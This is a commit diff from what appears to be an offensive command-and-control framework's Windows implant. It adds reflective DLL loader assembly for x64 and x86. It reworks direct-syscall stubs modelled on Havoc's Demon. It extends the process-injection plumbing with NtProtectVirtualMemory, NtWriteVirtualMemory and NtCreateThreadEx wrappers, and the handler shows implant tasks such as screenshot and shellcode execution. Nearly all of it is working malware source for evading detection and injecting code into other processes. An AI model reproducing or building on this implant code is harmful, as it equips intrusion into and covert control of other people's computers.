changed payload wizard structures

hideckies · May 2, 2024 · 5844e0b · 5844e0b
1 parent c7da5f3
commit 5844e0b
Show file tree

Hide file tree

Showing 51 changed files with 734 additions and 452 deletions.
diff --git a/payload/win/implant/CMakeLists.txt b/payload/win/implant/CMakeLists.txt
@@ -45,6 +45,9 @@ add_compile_definitions(REQUEST_PATH_SOCKET_OPEN=${REQUEST_PATH_SOCKET_OPEN})
 add_compile_definitions(REQUEST_PATH_SOCKET_CLOSE=${REQUEST_PATH_SOCKET_CLOSE})
 add_compile_definitions(AES_KEY_BASE64=${AES_KEY_BASE64})
 add_compile_definitions(AES_IV_BASE64=${AES_IV_BASE64})
+if(${PAYLOAD_FORMAT} STREQUAL "dll")
+    add_compile_definitions(IS_DLL=1)
+endif()
 
 # SOURCES
 set(SOURCE_ASM
@@ -120,7 +123,7 @@ if(${PAYLOAD_TYPE} STREQUAL \"beacon\")
         set(SOURCE_MAIN
                 src/hermit.cpp
                 src/main/beacon_dll.cpp
-                src/main/reflective.cpp
+                src/main/rfl.cpp
         )
     elseif(${PAYLOAD_FORMAT} STREQUAL "exe")
         set(SOURCE_MAIN
@@ -143,7 +146,6 @@ if(${PAYLOAD_FORMAT} STREQUAL "dll")
             PREFIX ""
             SUFFIX ".dll"
     )
-    add_definitions(-DIS_DLL)
 elseif(${PAYLOAD_FORMAT} STREQUAL "exe")
     add_executable(${PROJECT_NAME} ${SOURCE_ASM} ${SOURCE_CORE} ${SOURCE_MAIN})
     set_target_properties(${PROJECT_NAME}

diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp
@@ -12,6 +12,24 @@
 #include <string>
 #include <strsafe.h>
 
+typedef struct _PS_ATTRIBUTE
+{
+    ULONG_PTR Attribute;
+    SIZE_T Size;
+    union
+    {
+        ULONG_PTR Value;
+        PVOID ValuePtr;
+    };
+    PSIZE_T ReturnLength;
+} PS_ATTRIBUTE, *PPS_ATTRIBUTE;
+
+typedef struct _PS_ATTRIBUTE_LIST
+{
+    SIZE_T TotalLength;
+    PS_ATTRIBUTE Attributes[1];
+} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
+
 namespace Procs
 {
     // **NATIVE APIs**
@@ -32,15 +50,15 @@ namespace Procs
     // NtSetInformationProcess
     typedef NTSTATUS (NTAPI* LPPROC_NTSETINFORMATIONPROCESS)(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength);
     // NtCreateThreadEx
-    typedef NTSTATUS (NTAPI* LPPROC_NTCREATETHREADEX)(PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle, PVOID StartRoutine, PVOID Argument, ULONG CreateFlags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PVOID lpBytesBuffer);
+    typedef NTSTATUS (NTAPI* LPPROC_NTCREATETHREADEX)(PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE StartRoutine, PVOID Argument, ULONG CreateFlags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PPS_ATTRIBUTE_LIST AttributeList);
     // NtResumeThread
     typedef NTSTATUS (NTAPI* LPPROC_NTRESUMETHREAD)(HANDLE ThreadHandle, PULONG PreviousSuspendCount);
     // NtAllocateVirtualMemory
     typedef NTSTATUS (NTAPI* LPPROC_NTALLOCATEVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
-    // NtProtectVirtualMemory
-    typedef NTSTATUS (NTAPI* LPPROC_NTPROTECTVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID *BaseAddress, PSIZE_T RegionSize, ULONG NewProtect, PULONG OldProtect);
     // NtWriteVirtualMemory
     typedef NTSTATUS (NTAPI* LPPROC_NTWRITEVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);
+    // NtProtectVirtualMemory
+    typedef NTSTATUS (NTAPI* LPPROC_NTPROTECTVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID *BaseAddress, PSIZE_T RegionSize, ULONG NewProtect, PULONG OldProtect);
     // NtFreeVirtualMemory
     typedef NTSTATUS (NTAPI* LPPROC_NTFREEVIRTUALMEMORY)(HANDLE ProcessHandle, PVOID* BaseAddress, PSIZE_T RegionSize, ULONG FreeType);
     // NtDuplicateObject
@@ -164,6 +182,7 @@ namespace Procs
         LPPROC_NTRESUMETHREAD               lpNtResumeThread                    = nullptr;
         LPPROC_NTALLOCATEVIRTUALMEMORY      lpNtAllocateVirtualMemory           = nullptr;
         LPPROC_NTWRITEVIRTUALMEMORY         lpNtWriteVirtualMemory              = nullptr;
+        LPPROC_NTPROTECTVIRTUALMEMORY       lpNtProtectVirtualMemory            = nullptr;
         LPPROC_NTFREEVIRTUALMEMORY          lpNtFreeVirtualMemory               = nullptr;
         LPPROC_NTDUPLICATEOBJECT            lpNtDuplicateObject                 = nullptr;
         LPPROC_NTWAITFORSINGLEOBJECT        lpNtWaitForSingleObject             = nullptr;
@@ -222,6 +241,7 @@ namespace Procs
         Syscalls::SYSCALL                   sysNtResumeThread                   = {0};
         Syscalls::SYSCALL                   sysNtAllocateVirtualMemory          = {0};
         Syscalls::SYSCALL                   sysNtWriteVirtualMemory             = {0};
+        Syscalls::SYSCALL                   sysNtProtectVirtualMemory           = {0};
         Syscalls::SYSCALL                   sysNtFreeVirtualMemory              = {0};
         Syscalls::SYSCALL                   sysNtDuplicateObject                = {0};
         Syscalls::SYSCALL                   sysNtWaitForSingleObject            = {0};

diff --git a/payload/win/implant/include/core/syscalls.hpp b/payload/win/implant/include/core/syscalls.hpp
@@ -9,12 +9,9 @@
 #include <winternl.h>
 #include <windows.h>
 
-extern "C" DWORD 	SysSample(void*);
 extern "C" VOID 	SysSet(void*);
 extern "C" NTSTATUS SysInvoke(...);
 
-extern "C" DWORD SysNumber;
-
 template<typename FirstArg, typename SecondArg, typename... Args>
 NTSTATUS CallSysInvoke(FirstArg pSyscall, SecondArg lpProc, Args... args)
 {

diff --git a/payload/win/implant/include/core/system.hpp b/payload/win/implant/include/core/system.hpp
@@ -73,7 +73,7 @@ namespace System::Process
     HANDLE ProcessCreate(
         Procs::PPROCS   pProcs,
         LPCWSTR         lpApplicationName,
-        DWORD           dwDesiredAccess, // e.g. PROCESS_ALL_ACCESS
+        DWORD           dwDesiredAccess,
         HANDLE          hParentProcess,
         HANDLE          hToken
     );
@@ -95,25 +95,33 @@ namespace System::Process
     PVOID VirtualMemoryAllocate(
         Procs::PPROCS   pProcs,
         HANDLE          hProcess,
-        DWORD           dwSize,
-        DWORD           dwAllocationType,   // e.g. MEM_COMMIT | MEM_RESERVE
-        DWORD           dwProtect           // e.g. PAGE_READWRITE
+        SIZE_T          dwSize,
+        DWORD           dwAllocationType,
+        DWORD           dwProtect
     );
+    BOOL VirtualMemoryWrite(
+        Procs::PPROCS   pProcs,
+        HANDLE          hProcess,
+        PVOID           pBaseAddr,
+        PVOID           pBuffer,
+		SIZE_T          dwBufferSize,
+        PSIZE_T 		lpNumberOfBytesWritten
+    );
+    BOOL VirtualMemoryProtect(
+		Procs::PPROCS   pProcs,
+		HANDLE          hProcess,
+		PVOID*          pBaseAddr,
+		PSIZE_T         pdwSize,
+		DWORD           dwProtect,
+        PDWORD			pdwOldProtect
+	);
     BOOL VirtualMemoryFree(
         Procs::PPROCS   pProcs,
         HANDLE 	        hProcess,
 		PVOID* 	        pBaseAddr,
-		SIZE_T 	        dwSize,
+		PSIZE_T 	    pdwSize,
 		DWORD 	        dwFreeType
     );
-    BOOL VirtualMemoryWrite(
-        Procs::PPROCS   pProcs,
-        HANDLE          hProcess,
-        PVOID          pBaseAddr,
-        PVOID          pBuffer,
-		DWORD           dwBufferSize,
-        PDWORD 			lpNumberOfBytesWritten
-    );
     HANDLE RemoteThreadCreate(
         Procs::PPROCS           pProcs,
         HANDLE                  hProcess,

diff --git a/payload/win/implant/include/reflective.hpp → payload/win/implant/include/rfl.hpp b/payload/win/implant/include/reflective.hpp → payload/win/implant/include/rfl.hpp
diff --git a/payload/win/implant/src/asm/reflective.asm b/payload/win/implant/src/asm/reflective.asm
diff --git a/payload/win/implant/src/asm/rfl.x64.asm b/payload/win/implant/src/asm/rfl.x64.asm
@@ -0,0 +1,24 @@
+global ReflectiveCaller
+
+section .text
+
+     ReflectiveCaller:
+          call pop
+          pop:
+          pop rcx
+               
+     loop:
+          xor rbx, rbx
+          mov ebx, 0x5A4D
+          dec rcx
+          cmp bx,  word ds:[rcx]
+          jne loop
+          xor rax, rax
+          mov ax,  [rcx + 0x3C]
+          add rax, rcx
+          xor rbx, rbx
+          add bx,  0x4550
+          cmp bx,  word ds:[rax]
+          jne loop
+          mov rax, rcx
+          ret
diff --git a/payload/win/implant/src/asm/rfl.x86.asm b/payload/win/implant/src/asm/rfl.x86.asm
@@ -0,0 +1,24 @@
+global _ReflectiveCaller
+
+section .text
+
+     _ReflectiveCaller:
+          call pop
+          pop:
+          pop ecx
+               
+     loop:
+          xor ebx, ebx
+          mov ebx, 0x5A4D
+          dec ecx
+          cmp bx,  word ds:[ecx]
+          jne loop
+          xor eax, eax
+          mov ax,  [ecx + 0x3C]
+          add eax, ecx
+          xor ebx, ebx
+          add bx,  0x4550
+          cmp bx,  word ds:[eax]
+          jne loop
+          mov eax, ecx
+          ret
diff --git a/payload/win/implant/src/asm/syscalls.x64.asm b/payload/win/implant/src/asm/syscalls.x64.asm
@@ -1,23 +1,17 @@
 ; Inspired:
 ;   https://github.com/HavocFramework/Havoc/blob/ea3646e055eb1612dcc956130fd632029dbf0b86/payloads/Demon/src/asm/Syscall.x64.asm#L1
 
-section .text
-    global SysSample
-    global SysSet
-    global SysInvoke
+global SysSet
+global SysInvoke
 
-SysSample:
-    mov rax, rcx
-    mov eax, [rax]
-    add eax, [rax + 0x8]
-    ret
+section .text
 
-SysSet:
-    mov r11, rcx
-    ret
+    SysSet:
+        mov r11, rcx
+        ret
 
-SysInvoke:
-    mov r10, rcx
-    mov eax, [r11 + 0x8]
-    jmp qword [r11]
-    ret
+    SysInvoke:
+        mov r10, rcx
+        mov eax, [r11 + 0x8]
+        jmp qword [r11]
+        ret
diff --git a/payload/win/implant/src/asm/syscalls.x86.asm b/payload/win/implant/src/asm/syscalls.x86.asm
@@ -1,63 +1,19 @@
-section .data
+; Inspired:
+;   https://github.com/HavocFramework/Havoc/blob/ea3646e055eb1612dcc956130fd632029dbf0b86/payloads/Demon/src/asm/Syscall.x64.asm#L1
 
-extern NtOpenProcessSSN
-extern NtOpenProcessSyscall
-
-extern NtAllocateVirtualMemorySSN
-extern NtAllocateVirtualMemorySyscall
-
-extern NtWriteVirtualMemorySSN
-extern NtWriteVirtualMemorySyscall
-
-extern NtCreateThreadExSSN
-extern NtCreateThreadExSyscall
-
-extern NtWaitForSingleObjectSSN
-extern NtWaitForSingleObjectSyscall
-
-extern NtCloseSSN
-extern NtCloseSyscall
+global SysSet
+global SysInvoke
 
 section .text
 
-global NtOpenProcess
-NtOpenProcess:
-    mov r10, rcx
-    mov eax, [rel NtOpenProcessSSN]
-    jmp qword [rel NtOpenProcessSyscall]
-    ret
-
-global NtAllocateVirtualMemory
-NtAllocateVirtualMemory:
-    mov r10, rcx
-    mov eax, [rel NtAllocateVirtualMemorySSN]
-    jmp qword [rel NtAllocateVirtualMemorySyscall]
-    ret
-
-global NtWriteVirtualMemory
-NtWriteVirtualMemory:
-    mov r10, rcx
-    mov eax, [rel NtWriteVirtualMemorySSN]
-    jmp qword [rel NtWriteVirtualMemorySyscall]
-    ret
-
-global NtCreateThreadEx
-NtCreateThreadEx:
-    mov r10, rcx
-    mov eax, [rel NtCreateThreadExSSN]
-    jmp qword [rel NtCreateThreadExSyscall]
-    ret
-
-global NtWaitForSingleObject
-NtWaitForSingleObject:
-    mov r10, rcx
-    mov eax, [rel NtWaitForSingleObjectSSN]
-    jmp qword [rel NtWaitForSingleObjectSyscall]
-    ret
-
-global NtClose
-NtClose:
-    mov r10, rcx
-    mov eax, [rel NtCloseSSN]
-    jmp qword [rel NtCloseSyscall]
-    ret
+    SysSet:
+        mov edx, [esp + 0x4]
+        ret
+
+    SysInvoke:
+        mov ebx, [edx + 0x0]
+        mov eax, [edx + 0x4]
+        mov edx, esp
+        sub edx, 0x4
+        call DWORD ebx
+        ret      
diff --git a/payload/win/implant/src/core/handler.cpp b/payload/win/implant/src/core/handler.cpp
@@ -308,11 +308,11 @@ namespace Handler
                 );
                 break;
             case TASK_SCREENSHOT:
-                 // Is DLL implant, the screenshot feature is not available.
+                //  If the implant is DLL, the screenshot feature is not available.
                 #ifndef IS_DLL
                 wTaskResult = Task::Screenshot(pState);
                 #else
-                wTaskResult = L"Cannot take a screenshot on DLL";
+                wTaskResult = L"Error: Cannot take a screenshot on DLL";
                 #endif
                 break;
             case TASK_SHELLCODE:

diff --git a/payload/win/implant/src/core/procs.cpp b/payload/win/implant/src/core/procs.cpp
@@ -15,6 +15,7 @@ namespace Procs
         pProcs->lpNtResumeThread                = reinterpret_cast<LPPROC_NTRESUMETHREAD>(GetProcAddress(hNTDLL, "NtResumeThread"));
         pProcs->lpNtAllocateVirtualMemory       = reinterpret_cast<LPPROC_NTALLOCATEVIRTUALMEMORY>(GetProcAddress(hNTDLL, "NtAllocateVirtualMemory"));
         pProcs->lpNtWriteVirtualMemory          = reinterpret_cast<LPPROC_NTWRITEVIRTUALMEMORY>(GetProcAddress(hNTDLL, "NtWriteVirtualMemory"));
+        pProcs->lpNtProtectVirtualMemory        = reinterpret_cast<LPPROC_NTPROTECTVIRTUALMEMORY>(GetProcAddress(hNTDLL, "NtProtectVirtualMemory"));
         pProcs->lpNtFreeVirtualMemory           = reinterpret_cast<LPPROC_NTFREEVIRTUALMEMORY>(GetProcAddress(hNTDLL, "NtFreeVirtualMemory"));
         pProcs->lpNtDuplicateObject             = reinterpret_cast<LPPROC_NTDUPLICATEOBJECT>(GetProcAddress(hNTDLL, "NtDuplicateObject"));
         pProcs->lpNtWaitForSingleObject         = reinterpret_cast<LPPROC_NTWAITFORSINGLEOBJECT>(GetProcAddress(hNTDLL, "NtWaitForSingleObject"));
@@ -70,6 +71,7 @@ namespace Procs
             pProcs->sysNtCreateThreadEx             = Syscalls::FindSyscall(hNTDLL, "NtCreateThreadEx");
             pProcs->sysNtResumeThread               = Syscalls::FindSyscall(hNTDLL, "NtResumeThread");
             pProcs->sysNtAllocateVirtualMemory      = Syscalls::FindSyscall(hNTDLL, "NtAllocateVirtualMemory");
+            pProcs->sysNtProtectVirtualMemory       = Syscalls::FindSyscall(hNTDLL, "NtProtectVirtualMemory");
             pProcs->sysNtWriteVirtualMemory         = Syscalls::FindSyscall(hNTDLL, "NtWriteVirtualMemory");
             pProcs->sysNtFreeVirtualMemory          = Syscalls::FindSyscall(hNTDLL, "NtFreeVirtualMemory");
             pProcs->sysNtDuplicateObject            = Syscalls::FindSyscall(hNTDLL, "NtDuplicateObject");